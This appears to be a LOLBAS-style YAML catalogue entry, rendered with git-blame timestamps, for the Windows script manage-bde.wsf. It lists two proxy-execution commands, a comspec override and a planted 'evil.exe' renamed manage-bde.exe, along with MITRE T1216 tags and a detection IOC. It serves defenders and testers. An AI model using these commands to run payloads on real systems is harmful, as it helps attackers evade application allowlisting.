2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: Manage-bde.wsf
|
2018-09-26 11:41:58 +02:00
|
|
|
Description: Script for managing BitLocker
|
|
|
|
Author: 'Oddvar Moe'
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2018-05-25
|
2018-06-09 00:15:06 +02:00
|
|
|
Commands:
|
|
|
|
- Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
|
|
|
|
Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
|
2018-09-26 11:41:58 +02:00
|
|
|
Usecase: Proxy execution from script
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
|
|
|
|
Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
|
2018-09-26 11:41:58 +02:00
|
|
|
Usecase: Proxy execution from script
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
|
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Path: C:\Windows\System32\manage-bde.wsf
|
2021-01-10 16:04:52 +01:00
|
|
|
Code_Sample:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Code:
|
|
|
|
Detection:
|
|
|
|
- IOC: Manage-bde.wsf should normally not be invoked by a user
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
|
|
|
|
- Link: https://twitter.com/bohops/status/980659399495741441
|
2020-07-03 16:03:42 +02:00
|
|
|
- Link: https://twitter.com/JohnLaTwC/status/1223292479270600706
|
2018-09-26 11:41:58 +02:00
|
|
|
Acknowledgement:
|
|
|
|
- Person: Jimmy
|
|
|
|
Handle: '@bohops'
|
|
|
|
- Person: Daniel Bohannon
|
|
|
|
Handle: '@danielbohannon'
|
2020-07-03 16:03:42 +02:00
|
|
|
- Person: John Lambert
|
2020-08-15 00:17:27 +02:00
|
|
|
Handle: '@JohnLaTwC'
|
2020-07-03 16:03:42 +02:00
|
|
|
---
|